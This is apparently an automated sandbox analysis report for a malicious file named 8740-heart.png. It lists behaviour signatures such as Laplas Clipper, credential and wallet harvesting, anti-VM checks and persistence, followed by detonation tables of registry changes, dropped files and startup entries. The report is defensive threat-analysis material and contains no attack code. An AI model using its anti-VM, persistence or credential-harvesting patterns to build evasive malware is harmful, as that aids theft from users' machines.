Analysis Overview
SHA256
b4dbc2861c1cb405efae402534731e48814cb75d7b34755e82fad25ae4b572b6
Threat Level: Known bad
The file 8740-heart.png was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Laplas Clipper
Modifies WinLogon for persistence
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Modifies RDP port number used by Windows
Stops running service(s)
Sets service image path in registry
Drops file in Drivers directory
Downloads MZ/PE file
Checks BIOS information in registry
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Registers COM server for autorun
Drops startup file
Checks computer location settings
Adds Run key to start application
Checks installed software on the system
Checks whether UAC is enabled
Accesses cryptocurrency files/wallets, possible credential harvesting
Accesses 2FA software files, possible credential harvesting
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Detected potential entity reuse from brand google.
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Windows directory
Launches sc.exe
Drops file in Program Files directory
Program crash
Enumerates physical storage devices
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Script User-Agent
Suspicious behavior: AddClipboardFormatListener
Kills process with taskkill
Checks processor information in registry
Modifies Internet Explorer settings
Suspicious behavior: GetForegroundWindowSpam
Uses Volume Shadow Copy service COM API
Modifies registry class
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
Uses Volume Shadow Copy WMI provider
GoLang User-Agent
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Modifies data under HKEY_USERS
Modifies system certificate store
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-07-25 21:01
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-07-25 21:01
Reported
2023-07-25 21:31
Platform
win7-20230712-en
Max time kernel
1559s
Max time network
1561s
Command Line
Signatures
Enumerates physical storage devices
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\rundll32.exe | N/A |
Processes
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen C:\Users\Admin\AppData\Local\Temp\8740-heart.png
Network
Files
memory/2496-53-0x0000000001B40000-0x0000000001B41000-memory.dmp
memory/2496-54-0x0000000001B40000-0x0000000001B41000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-07-25 21:01
Reported
2023-07-25 21:31
Platform
win10v2004-20230703-en
Max time kernel
1635s
Max time network
1800s
Command Line
Signatures
Laplas Clipper
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\19965126155501944123.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\DRIVERS\SET95A1.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SET8E0.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SET6114.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SET64AF.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SET7E00.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SETFDE3.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SET5B95.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SET8302.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SETFDE3.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SET6ACC.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SET682B.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SET6ACC.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SETAE5D.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\mbamtestfile.dat | C:\Users\Admin\Downloads\MBSetup.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SET8302.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SET837D.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SET89CA.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SET89CA.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SET8205.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SET839E.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SET839E.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\drivers\mbae64.sys | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\MbamElam.sys | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\MbamElam.sys | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SET83CE.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\ProgramData\86996301282502183715.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\mbam.sys | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SET9E9B.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SET9E9B.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SET8E0.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SET64AF.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SET8205.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SET837D.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\farflt.sys | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SET7E00.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SET83CE.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SET5B95.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SET95A1.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SET6114.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SET682B.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SETAE5D.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Program Files\Google\Chrome\updater.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\mbamswissarmy.sys | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\MbamChameleon.sys | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\mwac.sys | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
Modifies RDP port number used by Windows
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MBAMSwissArmy\ImagePath = "\\SystemRoot\\System32\\Drivers\\mbamswissarmy.sys" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MBAMChameleon\ImagePath = "\\SystemRoot\\System32\\Drivers\\MbamChameleon.sys" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Downloads\MBSetup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Users\Admin\Downloads\MBSetup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\19965126155501944123.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\19965126155501944123.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS477B1A6F\WebCompanionInstaller.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-16.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\FILES-S0ft\Setup32x64.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-JN5DD.tmp\OneLaunch - Easy PDF_3x8a5.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-0CG1L.tmp\OneLaunch Setup_3x8a5.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\onelaunch.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneLaunchUpdater.lnk | C:\Users\Admin\AppData\Local\Temp\is-0CG1L.tmp\OneLaunch Setup_3x8a5.tmp | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneLaunch.lnk | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\onelaunch.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneLaunchChromium.lnk | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\onelaunch.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneLaunchUpdater.lnk | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\onelaunch.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneLaunch.lnk | C:\Users\Admin\AppData\Local\Temp\is-0CG1L.tmp\OneLaunch Setup_3x8a5.tmp | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneLaunchChromium.lnk | C:\Users\Admin\AppData\Local\Temp\is-0CG1L.tmp\OneLaunch Setup_3x8a5.tmp | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Registers COM server for autorun
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{278637DA-FDFB-45C7-8CD8-F2D8A9199AB0}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DE03E614-112D-43E0-8E15-E7236CC32108}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9DAB0CA5-AE19-41AE-955C-41DD44C52697}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{278637DA-FDFB-45C7-8CD8-F2D8A9199AB0}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F6D29500-933C-447C-9D88-9D814AF73808}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\CLSID\{b1cfdc44-dff4-204c-e500-42a98fc246ba}\LocalServer32 | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\onelaunch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{36A65E46-6CC1-4CA2-B51E-F4DD8C993DDC}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F36AD0D0-B5F0-4C69-AF08-603D177FEF0E}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11D1E5E8-14E1-4B5B-AE1A-2678CB91E8E5}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E1AC7139-D1FF-4DE9-84A4-92E2B47F5D2A}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E1AC7139-D1FF-4DE9-84A4-92E2B47F5D2A}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{130CD414-6BFD-4F6C-9362-A2264B222E76}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F415899A-1576-4C8B-BC9F-4854781F8A20}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{130CD414-6BFD-4F6C-9362-A2264B222E76}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EE8A9269-9E6E-4683-BCD3-41E9B16696DC}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D5599B6B-FA0C-45B5-8309-853B003EA412}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{376BE474-56D4-4177-BB4E-5610156F36C8}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{b1cfdc44-dff4-204c-e500-42a98fc246ba}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\OneLaunch\\5.17.4\\onelaunch.exe\" -ToastActivated" | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\onelaunch.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F415899A-1576-4C8B-BC9F-4854781F8A20}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BF474111-9116-45C6-AF53-209E64F1BB53}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{130CD414-6BFD-4F6C-9362-A2264B222E76}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{17BE78EE-B40A-4B9E-835F-38EC62F9D479}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{03141A2A-5C3A-458E-ABEC-0812AD7FF497}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F36AD0D0-B5F0-4C69-AF08-603D177FEF0E}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8F1C46F8-E697-4175-B240-CDE682A4BA2D}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EE8A9269-9E6E-4683-BCD3-41E9B16696DC}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{17BE78EE-B40A-4B9E-835F-38EC62F9D479}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9DAB0CA5-AE19-41AE-955C-41DD44C52697}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{251AD013-20AD-4C3F-8FE2-F66A429B4819}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E1AC7139-D1FF-4DE9-84A4-92E2B47F5D2A}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EE8A9269-9E6E-4683-BCD3-41E9B16696DC}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{36A65E46-6CC1-4CA2-B51E-F4DD8C993DDC}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{57CE581A-0CB6-4266-9CA0-19364C90A0B3}\InprocServer32\ThreadingModel = "Apartment" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{580243BF-3CEE-4131-A599-C6FED66BEB1B}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{251AD013-20AD-4C3F-8FE2-F66A429B4819}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8F1C46F8-E697-4175-B240-CDE682A4BA2D}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F36AD0D0-B5F0-4C69-AF08-603D177FEF0E}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11D1E5E8-14E1-4B5B-AE1A-2678CB91E8E5}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D372F21-E6DA-4B82-881A-79F6CA6B6AE1}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{03141A2A-5C3A-458E-ABEC-0812AD7FF497}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F6D29500-933C-447C-9D88-9D814AF73808}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\CLASSES\CLSID\{F36AD0D0-B5F0-4C69-AF08-603D177FEF0E}\LOCALSERVER32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{57CE581A-0CB6-4266-9CA0-19364C90A0B3}\InprocServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{278637DA-FDFB-45C7-8CD8-F2D8A9199AB0}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BF474111-9116-45C6-AF53-209E64F1BB53}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D372F21-E6DA-4B82-881A-79F6CA6B6AE1}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{36A65E46-6CC1-4CA2-B51E-F4DD8C993DDC}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DE03E614-112D-43E0-8E15-E7236CC32108}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
